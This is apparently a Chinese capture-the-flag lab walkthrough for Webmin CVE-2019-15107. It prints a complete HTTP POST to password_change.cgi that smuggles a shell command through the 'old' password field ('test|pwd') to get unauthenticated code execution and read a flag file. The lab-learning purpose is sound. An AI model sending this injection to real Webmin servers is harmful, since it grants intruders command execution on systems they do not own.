墨者学院-Webmin未经身份验证的远程代码执行

首先拿到靶场后进行访问，访问后来到一个登陆页面

根据题目可知，未授权的rce，所以可以先找一下历史CVE编号(CVE-2019-15107),找到之后直接对漏洞进行一个复现,漏洞点在密码重置功能出:Webmin--Webmin confuration--Authentication

burp抓取流量包，然后修改参数，注意需要把session_login.cgi改成password_change.cgi，下面的参数直接复制就行，这个漏洞点的触发只需要传一个expired参数执行命令即可

POST /password_change.cgi HTTP/1.1
Host: 124.70.64.48:47372
Cookie: redirect=1; testing=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: https://124.70.64.48:47372
Referer: https://124.70.64.48:47372/session_login.cgi
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

user=dfgfgf&pam=&expired=2&old=test|pwd&new1=test2&new2=test2

直接查询根下的key.txt即可